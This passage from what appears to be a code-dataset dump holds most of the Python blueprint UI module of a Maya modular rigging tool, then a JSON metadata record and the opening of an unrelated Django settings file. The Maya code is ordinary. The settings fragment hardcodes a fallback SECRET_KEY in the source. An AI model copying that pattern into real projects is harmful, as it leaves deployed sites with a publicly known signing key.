self.SetupSymmetryMoveExpressions_CheckBox()\n \n \n def RenameModule(self, *args):\n 
newName = pm.textField(self.UIElements[\"moduleName\"], query = True, text = True)\n \n symmetryMove = pm.checkBox(self.UIElements[\"symmetryMoveCheckBox\"], query = True, value = True)\n if symmetryMove:\n self.DeleteSymmetryMoveExpressions()\n \n self.moduleInstance.RenameModuleInstance(newName)\n \n if symmetryMove:\n self.SetupSymmetryMoveExpressions_CheckBox()\n \n previousSelected = pm.ls(selection = True)\n \n if len(previousSelected) > 0:\n pm.select(previousSelected, replace = True)\n \n else:\n pm.select(clear = True)\n \n \n \n def FindHookObjectFromSelection(self, *args):\n \n selectedObjects = pm.ls(selection = True, transforms = True)\n numberOfObjects = len(selectedObjects)\n hookObj = None\n \n if numberOfObjects != 0:\n hookObj = selectedObjects[numberOfObjects - 1]\n \n return hookObj\n \n \n \n def RehookModule_setup(self, *args):\n \n selectedNodes = pm.ls(selection = True, transforms = True)\n \n if len(selectedNodes) == 2:\n newHook = self.FindHookObjectFromSelection()\n self.moduleInstance.Rehook(newHook)\n \n else:\n self.DeleteScriptJob()\n \n currentSelection = pm.ls(selection = True)\n \n pm.headsUpMessage(\"Please select the joint you wish to re-hook to. Clear selection to un-hook.\")\n \n pm.scriptJob(event = ['SelectionChanged', partial(self.RehookModule_callback, currentSelection)], runOnce = True)\n \n \n \n \n def RehookModule_callback(self, _currentSelection):\n newHook = self.FindHookObjectFromSelection()\n \n self.moduleInstance.Rehook(newHook)\n \n if len(_currentSelection) > 0:\n pm.select(_currentSelection, replace = True)\n else:\n pm.select(clear = True)\n \n \n self.CreateScriptJob()\n \n \n \n def SnapRootToHook(self, *args):\n self.moduleInstance.SnapRootToHook()\n \n \n def ConstrainRootToHook(self, *args):\n self.moduleInstance.ConstrainRootToHook()\n \n pm.button(self.UIElements[\"constrainBtn\"], edit = True, label = \"Unconstrain Root\", command = self.UnconstrainRootFromHook)\n \n \n def UnconstrainRootFromHook(self, *args):\n self.moduleInstance.UnconstrainRootFromHook()\n \n pm.button(self.UIElements[\"constrainBtn\"], edit = True, label = \"Constrain Root > Hook\", command = self.ConstrainRootToHook)\n \n \n def GroupSelected(self, *args):\n import System.groupSelected as group\n reload(group)\n \n group.GroupSelected().ShowUI()\n \n \n def UngroupSelected(self, *args):\n import System.groupSelected as group\n reload(group)\n \n group.UngroupSelected()\n \n \n \n def MirrorModule(self, *args):\n \n import System.mirrorModule as mirror\n reload(mirror)\n \n mirror.MirrorModule()\n \n \n def SetupSymmetryMoveExpressions_CheckBox(self, *args):\n self.DeleteScriptJob()\n \n self.SetupSymmetryMoveExpressions()\n \n self.CreateScriptJob()\n \n \n \n def SetupSymmetryMoveExpressions(self, *args):\n pm.namespace(setNamespace = \":\")\n selection = pm.ls(selection = True, transforms = True)\n \n expressionContainer = pm.container(name = \"symmetryMove_container\")\n \n if len(selection) == 0:\n return\n \n linkedObjs = []\n for obj in selection:\n if obj in linkedObjs:\n continue\n \n # Apply symmetry to group\n if obj.find(\"Group__\") == 0:\n if pm.attributeQuery(\"mirrorLinks\", node = obj, exists = True):\n mirrorLinks = pm.getAttr(\"%s.mirrorLinks\" %obj)\n groupInfo = mirrorLinks.rpartition(\"__\")\n mirrorObj = groupInfo[0]\n axis = groupInfo[2]\n \n linkedObjs.append(mirrorObj)\n \n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = True, _globalScale = True)\n \n else:\n objNamespaceInfo = 
utils.StripLeadingNamespace(obj)\n \n if objNamespaceInfo != None:\n if pm.attributeQuery(\"mirrorLinks\", node = \"%s:module_grp\" %objNamespaceInfo[0], exists = True):\n mirrorLinks = pm.getAttr(\"%s:module_grp.mirrorLinks\" %objNamespaceInfo[0])\n \n moduleInfo = mirrorLinks.rpartition(\"__\")\n module = moduleInfo[0]\n axis = moduleInfo[2]\n \n # Apply symmetry to translation control\n if objNamespaceInfo[1].find(\"translation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = False, _globalScale = False)\n \n # Apply symmetry to module transform\n elif objNamespaceInfo[1].find(\"module_transform\") == 0:\n mirrorObj = \"%s:module_transform\" %module\n linkedObjs.append(mirrorObj)\n self.SetupSymmetryMoveForObject(obj, mirrorObj, axis, _translation = True, _orientation = True, _globalScale = True)\n \n # Apply symmetry to rotation control\n elif objNamespaceInfo[1].find(\"orientation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n \n expressionString = \"%s.rotateX = %s.rotateX;\\n\" %(mirrorObj, obj)\n expression = pm.expression(name = \"%s_symmetryMoveExpression\" %mirrorObj, string = expressionString)\n utils.AddNodeToContainer(expressionContainer, expression)\n \n # Apply symmetry to single orientation control\n elif objNamespaceInfo[1].find(\"singleJointOrientation_control\") != -1:\n mirrorObj = \"%s:%s\" %(module, objNamespaceInfo[1])\n linkedObjs.append(mirrorObj)\n \n expressionString = \"%s.rotateX = %s.rotateX;\\n\" %(mirrorObj, obj)\n expressionString += \"%s.rotateY = %s.rotateY;\\n\" %(mirrorObj, obj)\n expressionString += \"%s.rotateZ = %s.rotateZ;\\n\" %(mirrorObj, obj)\n \n expression = pm.expression(name = \"%s_symmetryMoveExpression\" %mirrorObj, string = expressionString)\n utils.AddNodeToContainer(expressionContainer, expression)\n \n pm.lockNode(expressionContainer, lock = True)\n pm.select(selection, replace = True)\n \n \n \n def SetupSymmetryMoveForObject(self, _obj, _mirrorObj, _axis, _translation = False, _orientation = False, _globalScale = False):\n \n duplicateObject = pm.duplicate(_obj, parentOnly = True, inputConnections = True, name = \"%s_mirrorHelper\" %_obj)[0]\n \n emptyGroup = pm.group(empty = True, name = \"%smirror_scale_grp\" %_obj)\n pm.parent(duplicateObject, emptyGroup, absolute = True)\n \n scaleAttribute = \".scale%s\" %_axis\n pm.setAttr(\"%s%s\" %(emptyGroup, scaleAttribute), -1)\n \n # mel expression 'namespace -setNamespace \":\";' causes update errors post Maya 2010\n expressionString = ''\n if _translation:\n expressionString += '$worldSpacePos = `xform -query -worldSpace -translation %s`;\\n' %_obj\n if _orientation:\n expressionString += '$worldSpaceOrient = `xform -query -worldSpace -rotation %s`;\\n' %_obj\n \n \n attrs = []\n if _translation:\n attrs.extend([\".translateX\", \".translateY\", \".translateZ\"])\n if _orientation:\n attrs.extend([\".rotateX\", \".rotateY\", \".rotateZ\"])\n \n \n # Force an update of the expression\n for attr in attrs:\n expressionString += \"%s%s = %s%s;\\n\" %(duplicateObject, attr, _obj, attr)\n \n \n i = 0\n for axis in [\"X\", \"Y\", \"Z\"]:\n if _translation:\n expressionString += \"%s.translate%s = $worldSpacePos[%d];\\n\" %(duplicateObject, axis, i)\n if _orientation:\n expressionString += \"%s.rotate%s = $worldSpaceOrient[%d];\\n\" %(duplicateObject, axis, i)\n \n i += 1\n \n \n if 
_globalScale:\n expressionString += \"%s.globalScale = %s.globalScale;\\n\" %(duplicateObject, _obj)\n \n # Create unique expression name from namespace\n expressionNames = utils.StripLeadingNamespace(duplicateObject)\n expName = ''\n \n if expressionNames == None:\n expName = '%s' %duplicateObject\n else:\n expName = \"%s__%s\" %(expressionNames[0], expressionNames[1])\n \n expression = pm.expression(name = \"%s__symmetryMoveExpression\" %expName, string = expressionString)\n \n \n constraint = ''\n if _translation and _orientation:\n constraint = pm.parentConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n elif _translation:\n constraint = pm.pointConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n elif _orientation:\n constraint = pm.orientConstraint(duplicateObject, _mirrorObj, maintainOffset = False, name = \"%s_symmetryMoveConstraint\" %_mirrorObj)\n \n if _globalScale:\n pm.connectAttr(\"%s.globalScale\" %duplicateObject, \"%s.globalScale\" %_mirrorObj)\n \n \n utils.AddNodeToContainer(\"symmetryMove_container\", [duplicateObject, emptyGroup, expression, constraint], True)\n \n \n def DeleteSymmetryMoveExpressions(self, *args):\n container = \"symmetryMove_container\"\n \n if pm.objExists(container):\n pm.lockNode(container, lock = False)\n \n nodes = pm.container(container, query = True, nodeList = True)\n nodes = pm.ls(nodes, type = [\"parentConstraint\", \"pointConstraint\", \"orientConstraint\"])\n \n if len(nodes) > 0:\n pm.delete(nodes)\n \n pm.delete(container)\n \n \n def PrepareForTemplate(self, *args):\n \n pm.select(all = True)\n rootLevelNodes = pm.ls(selection = True, transforms = True)\n \n filteredNodes = []\n for node in rootLevelNodes:\n \n if node.find(\"Group__\") == 0:\n filteredNodes.append(node)\n else:\n nodeNamespaceInfo = utils.StripAllNamespaces(node)\n \n if nodeNamespaceInfo != None:\n if nodeNamespaceInfo[1] == \"module_transform\":\n filteredNodes.append(node)\n \n \n pm.select(filteredNodes, replace = True)\n self.GroupSelected()\n \n \n def SaveCurrentAsTemplate(self, *args):\n \n self.saveTemplateUIElements = {}\n \n if pm.window(\"saveTemplate_UI_window\", exists = True):\n pm.deleteUI(\"saveTemplate_UI_window\")\n \n windowWidth = 300\n windowHeight = 152\n self.saveTemplateUIElements[\"window\"] = pm.window(\"saveTemplate_UI_window\", width = windowWidth, height = windowHeight, title = \"Save Current as Template\", sizeable = False)\n \n self.saveTemplateUIElements[\"topLevelColumn\"] = pm.columnLayout(adjustableColumn = True, columnAlign = \"center\", rowSpacing = 3, parent = self.saveTemplateUIElements[\"window\"])\n self.saveTemplateUIElements[\"templateName_rowColumn\"] = pm.rowColumnLayout(numberOfColumns = 2, columnAttach = (1, 'right', 0), columnWidth = [(1, 90), (2, windowWidth - 100)], parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n pm.text(label = \"Template Name: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateName\"] = pm.textField(text = '([a-z][A-Z][0-9] and _ only)', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Title: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateTitle\"] = pm.textField(text = 'Title', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Description: \", parent = 
self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateDescription\"] = pm.textField(text = 'Description', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n pm.text(label = \"Icon: \", parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n self.saveTemplateUIElements[\"templateIcon\"] = pm.textField(text = '[programRoot]/Icons/_icon.xpm', parent = self.saveTemplateUIElements[\"templateName_rowColumn\"])\n \n \n pm.separator(style = \"in\", parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n columnWidth = (windowWidth / 2) - 5\n self.saveTemplateUIElements[\"button_row\"] = pm.rowLayout(numberOfColumns = 2, columnWidth = [(1, columnWidth), (2, columnWidth)], columnAttach = [(1, \"both\", 10), (2, \"both\", 10)], columnAlign = [(1, \"center\"), (2, \"center\")], parent = self.saveTemplateUIElements[\"topLevelColumn\"])\n \n pm.button(label = \"Accept\", command = self.SaveCurrentAsTemplate_AcceptWindow, parent = self.saveTemplateUIElements[\"button_row\"])\n pm.button(label = \"Cancel\", command = self.SaveCurrentAsTemplate_CancelWindow, parent = self.saveTemplateUIElements[\"button_row\"])\n \n pm.showWindow(self.saveTemplateUIElements[\"window\"])\n \n \n def SaveCurrentAsTemplate_CancelWindow(self, *args):\n pm.deleteUI(self.saveTemplateUIElements[\"window\"])\n \n \n def SaveCurrentAsTemplate_AcceptWindow(self, *args):\n templateName = pm.textField(self.saveTemplateUIElements[\"templateName\"], query = True, text = True)\n \n #programRoot = self.directory\n programRoot = os.environ[\"RIGGING_TOOL_ROOT\"]\n templateFileName = \"%s/Templates/%s.ma\" %(programRoot, templateName)\n \n if os.path.exists(templateFileName):\n pm.confirmDialog(title = \"Save Current as Template\", message = \"Template already exists with that name. 
Aborting save.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n if pm.objExists(\"Group_container\"):\n pm.select(\"Group_container\", replace = True)\n else:\n pm.select(clear = True)\n \n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n for n in namespaces:\n if n.find(\"__\") != -1:\n pm.select(\"%s:module_container\" %n, add = True)\n \n pm.exportSelected(templateFileName, type = \"mayaAscii\")\n pm.select(clear = True)\n \n title = pm.textField(self.saveTemplateUIElements[\"templateTitle\"], query = True, text = True)\n description = pm.textField(self.saveTemplateUIElements[\"templateDescription\"], query = True, text = True)\n icon = pm.textField(self.saveTemplateUIElements[\"templateIcon\"], query = True, text = True)\n \n \n if icon.find(\"[programRoot]\") != -1:\n icon = \"%s%s\" %(programRoot, icon.partition(\"[programRoot]\")[2])\n \n \n templateDescriptionFileName = \"%s/Templates/%s.txt\" %(programRoot, templateName)\n with open(templateDescriptionFileName, 'w') as file:\n \n file.write(\"%s\\n\" %title)\n file.write(\"%s\\n\" %description)\n file.write(\"%s\\n\" %icon)\n \n \n self.CreateTemplateInstallButton(templateFileName)\n pm.showWindow(self.UIElements[\"window\"])\n \n pm.deleteUI(self.saveTemplateUIElements[\"window\"])\n \n \n \n def InstallTemplate(self, _templateAndPath, *args):\n pm.importFile(_templateAndPath, namespace = \"TEMPLATE_1\")\n \n self.ResolveNamespaceClashes(\"TEMPLATE_1\")\n \n groupContainer = \"TEMPLATE_1:Group_container\"\n if pm.objExists(groupContainer):\n self.ResolveGroupNameClashes(\"TEMPLATE_1\")\n \n pm.lockNode(groupContainer, lock = False, lockUnpublished = False)\n \n oldGroupContainer = \"Group_container\"\n if pm.objExists(oldGroupContainer):\n pm.lockNode(oldGroupContainer, lock = False, lockUnpublished = False)\n \n nodeList = pm.container(groupContainer, query = True, nodeList = True)\n utils.AddNodeToContainer(oldGroupContainer, nodeList, _force = True)\n \n pm.delete(groupContainer)\n else:\n pm.rename(groupContainer, oldGroupContainer)\n \n pm.lockNode(\"Group_container\", lock = True, lockUnpublished = True)\n \n # Clean up temporary namespace\n pm.namespace(setNamespace = \":\")\n pm.namespace(moveNamespace = (\"TEMPLATE_1\", \":\"), force = True)\n pm.namespace(removeNamespace = \"TEMPLATE_1\")\n \n \n def ResolveNamespaceClashes(self, _tempNamespace):\n returnNames = []\n \n pm.namespace(setNamespace = _tempNamespace)\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n pm.namespace(setNamespace = \":\")\n existingNamespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n \n for i in range(len(namespaces)):\n namespaces[i] = namespaces[i].partition(\"%s:\" %_tempNamespace)[2]\n \n for name in namespaces:\n newName = str(name)\n oldName = \"%s:%s\" %(_tempNamespace, name)\n \n if name in existingNamespaces:\n highestSuffix = utils.FindHighestTrailingNumber(existingNamespaces, \"%s_\" %name)\n highestSuffix += 1\n \n newName = \"%s_%d\" %(name, highestSuffix)\n \n returnNames.append([oldName, newName])\n \n \n self.ResolveNameChangeMirrorLinks(returnNames, _tempNamespace)\n \n \n self.RenameNamespaces(returnNames)\n \n return returnNames\n \n \n def ResolveGroupNameClashes(self, _tempNamespace):\n pm.namespace(setNamespace = _tempNamespace)\n dependencyNodes = pm.namespaceInfo(listOnlyDependencyNodes = True)\n \n pm.namespace(setNamespace = \":\")\n \n transforms = pm.ls(dependencyNodes, transforms = True)\n \n groups = []\n for node in 
transforms:\n if node.find(\"%s:Group__\"% _tempNamespace) == 0:\n groups.append(node)\n \n if len(groups) == 0:\n return groups\n \n groupNames = []\n for group in groups:\n groupName = group.partition(\"%s:\" %_tempNamespace)[2]\n newGroupName = str(groupName)\n \n if pm.objExists(newGroupName):\n existingGroups = pm.ls(\"Group__*\", transforms = True)\n \n highestSuffix = utils.FindHighestTrailingNumber(existingGroups, \"%s_\" %groupName)\n highestSuffix += 1\n \n newGroupName = \"%s_%d\" %(groupName, highestSuffix)\n \n groupNames.append([group, newGroupName])\n \n \n self.ResolveNameChangeMirrorLinks(groupNames, _tempNamespace)\n \n groupContainer = \"%s:Group_container\" %_tempNamespace\n if pm.objExists(groupContainer):\n pm.lockNode(groupContainer, lock = False, lockUnpublished = False)\n \n for name in groupNames:\n pm.rename(name[0], name[1])\n \n if pm.objExists(groupContainer):\n pm.lockNode(groupContainer, lock = True, lockUnpublished = True)\n \n \n return groupNames\n \n \n \n def RenameNamespaces(self, _names):\n \n for name in _names:\n oldName = name[0]\n newName = name[1]\n \n pm.namespace(setNamespace = \":\")\n pm.namespace(add = newName)\n pm.namespace(moveNamespace = [oldName, newName])\n pm.namespace(removeNamespace = oldName)\n \n \n def ResolveNameChangeMirrorLinks(self, _names, _tempNamespace):\n \n moduleNamespaces = False\n firstOldNode = _names[0][0]\n \n if utils.StripLeadingNamespace(firstOldNode)[1].find(\"Group__\") == -1:\n moduleNamespaces = True\n \n for n in _names:\n oldNode = n[0]\n \n if moduleNamespaces:\n oldNode += \":module_grp\"\n \n if pm.attributeQuery(\"mirrorLinks\", node = oldNode, exists = True):\n mirrorLink = pm.getAttr(\"%s.mirrorLinks\" %oldNode)\n mirrorLinkInfo = mirrorLink.rpartition(\"__\")\n\n mirrorNode = mirrorLinkInfo[0]\n mirrorAxis = mirrorLinkInfo[2]\n \n found = False\n container = \"\"\n \n if moduleNamespaces:\n oldNodeNamespace = n[0]\n container = \"%s:module_container\" %oldNodeNamespace\n else:\n container = \"%s:Group_container\" %_tempNamespace\n \n for nm in _names:\n oldLink = nm[0].partition(\"%s:\" %_tempNamespace)[2]\n \n if oldLink == mirrorNode:\n newLink = nm[1]\n \n if pm.objExists(container):\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n pm.setAttr(\"%s.mirrorLinks\" %oldNode, \"%s__%s\" %(newLink, mirrorAxis), type = \"string\")\n \n if pm.objExists(container):\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n found = True\n break\n \n if not found:\n if pm.objExists(container):\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n pm.deleteAttr(oldNode, attribute = \"mirrorLinks\")\n \n if pm.objExists(container):\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n \n def DuplicateModule(self, *args):\n \n modules = set([])\n groups = set([])\n \n selection = pm.ls(selection = True, transforms = True)\n \n if len(selection) == 0:\n return\n \n for node in selection:\n selectionNamespaceInfo = utils.StripLeadingNamespace(node)\n \n if selectionNamespaceInfo != None:\n if selectionNamespaceInfo[0].find(\"__\") != -1:\n modules.add(selectionNamespaceInfo[0])\n \n else:\n if node.find(\"Group__\") == 0:\n groups.add(node)\n \n \n for group in groups:\n moduleInfo = self.DuplicateModule_processGroup(group)\n \n for module in moduleInfo:\n modules.add(module)\n \n \n if len(groups) > 0:\n groupSelection = list(groups)\n pm.select(groupSelection, replace = True)\n \n else:\n pm.select(clear = True)\n \n \n for module in modules:\n 
pm.select(\"%s:module_container\" %module, add = True)\n \n \n if len(groups) > 0:\n pm.lockNode(\"Group_container\", lock = False, lockUnpublished = True)\n \n elif len(modules) == 0:\n return\n \n \n #duplicateFileName = \"%s/__duplicateCache.ma\" %self.directory\n duplicateFileName = \"%s/__duplicateCache.ma\" %os.environ[\"RIGGING_TOOL_ROOT\"]\n pm.exportSelected(duplicateFileName, type = \"mayaAscii\", force = True)\n \n if len(groups) > 0:\n pm.lockNode(\"Group_container\", lock = True, lockUnpublished = True)\n \n \n self.InstallDuplicate(duplicateFileName, selection)\n \n pm.setToolTo(\"moveSuperContext\")\n \n \n def InstallDuplicate(self, _duplicatePath, _selection, *args):\n pm.importFile(_duplicatePath, namespace = \"TEMPLATE_1\")\n \n moduleNames = self.ResolveNamespaceClashes(\"TEMPLATE_1\")\n groupNames = self.ResolveGroupNameClashes(\"TEMPLATE_1\")\n \n groups = []\n for name in groupNames:\n groups.append(name[1])\n \n if len(groups) > 0:\n sceneGroupContainer = \"Group_container\"\n pm.lockNode(sceneGroupContainer, lock = False, lockUnpublished = False)\n \n utils.AddNodeToContainer(sceneGroupContainer, groups, _includeShapes = True, _force = True)\n \n for group in groups:\n groupNiceName = group.partition(\"__\")[2]\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.translate\" %group, \"%s_t\" %groupNiceName])\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.rotate\" %group, \"%s_r\" %groupNiceName])\n pm.container(sceneGroupContainer, edit = True, publishAndBind = [\"%s.globalScale\" %group, \"%s_globalScale\" %groupNiceName])\n \n pm.lockNode(sceneGroupContainer, lock = True, lockUnpublished = True)\n \n pm.namespace(setNamespace = \":\")\n \n pm.namespace(moveNamespace = (\"TEMPLATE_1\", \":\"), force = True)\n pm.namespace(removeNamespace = \"TEMPLATE_1\")\n \n newSelection = []\n for node in _selection:\n found = False\n \n for group in groupNames:\n oldName = group[0].partition(\"TEMPLATE_1:\")[2]\n newName = group[1]\n \n if node == oldName:\n newSelection.append(newName)\n found = True\n break\n \n if not found:\n nodeNamespaceInfo = utils.StripLeadingNamespace(node)\n \n if nodeNamespaceInfo != None:\n nodeNamespace = nodeNamespaceInfo[0]\n nodeName = nodeNamespaceInfo[1]\n \n searchName = \"TEMPLATE_1:%s\" %nodeNamespace\n \n for module in moduleNames:\n if module[0] == searchName:\n newSelection.append(\"%s:%s\" %(module[1], nodeName))\n \n if len(newSelection) > 0:\n pm.select(newSelection, replace = True)\n \n \n \n def DuplicateModule_processGroup(self, _group):\n \n returnModules = []\n \n children = pm.listRelatives(_group, children = True, type = \"transform\")\n \n for c in children:\n selectionNamespaceInfo = utils.StripLeadingNamespace(c)\n \n if selectionNamespaceInfo != None:\n returnModules.append(selectionNamespaceInfo[0])\n \n else:\n if c.find(\"Group__\") == 0:\n returnModules.extend(self.DuplicateModule_processGroup(c))\n \n return returnModules\n \n \n def Publish(self, *args):\n \n result = pm.confirmDialog(messageAlign = \"center\", title = \"Publish Character\", message = \"The action of publishing cannot be undone. Make sure the geometry have been attached to the rig before proceeding. 
\\nAre you sure you wish to continue?\", button = [\"Accept\", \"Cancel\"], defaultButton = \"Accept\", cancelButton = \"Cancel\", dismissString = \"Cancel\")\n \n if result != \"Accept\":\n return\n \n # Name character to be published\n result = pm.promptDialog(title = \"Publish Character\", message = \"Please specify a character name ([a-z][A-Z][0-9] and _ only)\", button = [\"Accept\", \"Cancel\"], defaultButton = \"Accept\", cancelButton = \"Cancel\", dismissString = \"Cancel\")\n if result == \"Accept\":\n \n characterName = pm.promptDialog(query = True, text = True)\n #characterFileName = \"%s/Characters/%s.ma\" %(self.directory, characterName)\n characterFileName = \"%s/Characters/%s.ma\" %(os.environ[\"RIGGING_TOOL_ROOT\"], characterName)\n \n if os.path.exists(characterFileName):\n pm.confirmDialog(title = \"Publish Character\", message = \"Character already exists with that name. Aborting publish.\", button = [\"Accept\"], defaultButton = \"Accept\")\n return\n \n pm.lockNode(\"Blueprints_Locked\", lock = False, lockUnpublished = False)\n pm.delete(\"Blueprints_Locked\")\n \n pm.namespace(setNamespace = \":\")\n namespaces = pm.namespaceInfo(listOnlyNamespaces = True)\n \n # Collect valid module names\n moduleNameInfo = utils.FindAllModuleNames(\"/Modules/Blueprint\")\n validModules = moduleNameInfo[0]\n validModuleNames = moduleNameInfo[1]\n \n # Compare module(s) for validity\n foundModuleInstances = []\n for n in namespaces:\n splitString = n.partition(\"__\")\n \n if splitString[1] != '':\n module = splitString[0]\n \n if module in validModuleNames:\n foundModuleInstances.append(n)\n \n \n moduleGroups = []\n moduleContainers = []\n \n # Collect module groups and containers\n for moduleInstance in foundModuleInstances:\n moduleGroups.append(\"%s:module_grp\" %moduleInstance)\n moduleContainers.append(\"%s:module_container\" %moduleInstance)\n \n # Unlock containers\n for container in moduleContainers:\n pm.lockNode(container, lock = False, lockUnpublished = False)\n \n # Group modules together as a character\n characterGroup = pm.group(empty = True, name = \"character_grp\")\n for group in moduleGroups:\n pm.parent(group, characterGroup, absolute = True)\n \n \n pm.select(characterGroup, replace = True)\n pm.addAttr(attributeType = \"bool\", defaultValue = 0, keyable = False, longName = \"moduleMaintenanceVisibility\")\n pm.addAttr(attributeType = \"bool\", defaultValue = 1, keyable = True, longName = \"animationControlVisibility\")\n \n invertModuleMaintenanceVisibility = pm.shadingNode(\"reverse\", name = \"reverse_moduleMaintenanceVisibility\", asUtility = True)\n pm.connectAttr(\"%s.moduleMaintenanceVisibility\" %characterGroup, \"%s.inputX\" %invertModuleMaintenanceVisibility, force = True)\n \n moduleVisibilityMultiply = pm.shadingNode(\"multiplyDivide\", name = \"moduleVisibilityMultiply\", asUtility = True)\n pm.connectAttr(\"%s.outputX\" %invertModuleMaintenanceVisibility, \"%s.input1X\" %moduleVisibilityMultiply)\n pm.connectAttr(\"%s.animationControlVisibility\" %characterGroup, \"%s.input2X\" %moduleVisibilityMultiply)\n \n # Create a list containing all of the character nodes\n characterNodes = list(moduleContainers)\n characterNodes.append(characterGroup)\n characterNodes.append(invertModuleMaintenanceVisibility)\n characterNodes.append(moduleVisibilityMultiply)\n \n # Add list to a character container\n characterContainer = pm.container(name = \"character_container\")\n utils.AddNodeToContainer(characterContainer, characterNodes)\n \n 
pm.container(characterContainer, edit = True, publishAndBind = [\"%s.animationControlVisibility\" %characterGroup, \"animationControlVisibility\"])\n \n # Publish the module containers attributes to the character container\n for container in moduleContainers:\n moduleNamespace = utils.StripLeadingNamespace(container)[0]\n blueprintJointsGrp = \"%s:blueprint_joints_grp\" %moduleNamespace\n \n pm.connectAttr(\"%s.moduleMaintenanceVisibility\" %characterGroup, \"%s.visibility\" %blueprintJointsGrp)\n pm.setAttr(\"%s.overrideEnabled\" %blueprintJointsGrp, 1)\n \n publishedNames = pm.container(container, query = True, publishName = True)\n userSpecifiedName = moduleNamespace.partition(\"__\")[2]\n \n for name in publishedNames:\n pm.container(characterContainer, edit = True, publishAndBind = [\"%s.%s\" %(container, name), \"%s_%s\" %(userSpecifiedName, name)])\n \n \n characterContainers = list(moduleContainers)\n characterContainers.append(characterContainer)\n \n # Select top level transforms in scene\n pm.select(all = True)\n topLevelTransforms = pm.ls(selection = True, transforms = True)\n pm.select(clear = True)\n \n topLevelTransforms.remove(characterGroup)\n \n # Create visibility attributes and add to character container\n if len(topLevelTransforms) != 0:\n nonBlueprintGroup = pm.group(topLevelTransforms, absolute = True, parent = characterGroup, name = \"non_blueprint_grp\")\n pm.setAttr(\"%s.overrideEnabled\" %nonBlueprintGroup, 1)\n pm.setAttr(\"%s.overrideDisplayType\" %nonBlueprintGroup, 2) # Reference display type\n \n pm.select(nonBlueprintGroup, replace = True)\n pm.addAttr(attributeType = \"bool\", defaultValue = 1, longName = \"display\", keyable = True)\n \n visibilityMultiply = pm.shadingNode(\"multiplyDivide\", name = \"non_blueprint_visibilityMultiply\", asUtility = True)\n pm.connectAttr(\"%s.outputX\" %invertModuleMaintenanceVisibility, \"%s.input1X\" %visibilityMultiply, force = True)\n pm.connectAttr(\"%s.display\" %nonBlueprintGroup, \"%s.input2X\" %visibilityMultiply, force = True)\n pm.connectAttr(\"%s.outputX\" %visibilityMultiply, \"%s.visibility\" %nonBlueprintGroup, force = True)\n \n nonBlueprintContainer = pm.container(addNode = nonBlueprintGroup, includeHierarchyBelow = True, includeNetwork = True, includeShapes = True, name = \"non_blueprint_container\")\n utils.AddNodeToContainer(characterContainer, nonBlueprintContainer)\n characterContainers.append(nonBlueprintContainer)\n \n publishedName = \"displayNonBlueprintNodes\"\n pm.container(nonBlueprintContainer, edit = True, publishAndBind = [\"%s.display\" %nonBlueprintGroup, publishedName])\n pm.container(characterContainer, edit = True, publishAndBind = [\"%s.%s\" %(nonBlueprintContainer, publishedName), publishedName])\n \n # Lock character container\n for container in characterContainers:\n pm.lockNode(container, lock = True, lockUnpublished = True)\n \n \n # Export character as a .ma file\n pm.select(characterContainer, replace = True)\n pm.exportSelected(characterFileName, type = \"mayaAscii\")\n \n # Create locator to mark scene as published\n scenePublished = pm.spaceLocator(name = \"Scene_Published\")\n pm.setAttr(\"%s.visibility\" %scenePublished, 0)\n pm.lockNode(scenePublished, lock = True, lockUnpublished = True)\n \n \n pm.select(clear = True)\n \n pm.button(self.UIElements[\"publishBtn\"], edit = True, enable = 
False)","repo_name":"Shadowtags/ModularRiggingTool","sub_path":"nwModularRiggingTool/Modules/System/blueprint_UI.py","file_name":"blueprint_UI.py","file_ext":"py","file_size_in_byte":63138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41329160275","text":"# Django settings.\n\nimport environ\nfrom pathlib import Path\n\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nenv = environ.Env()\nenviron.Env.read_env(BASE_DIR / '.env')\n\n\n# Security\n\nSECRET_KEY = env(\n 'SECRET_KEY',\n default='django-insecure-bdmvw1%zbrd1@6760ok)9k4mc3o+t39m_56(pc!e=5g#*g_2vb',\n)\nDEBUG = env.bool('DEBUG', default=False)\nALLOWED_HOSTS = env.list('ALLOWED_HOSTS', default=['localhost', '0.0.0.0', '127.0.0.1'])\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.auth',\n 'project.shortener',\n 'rest_framework',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 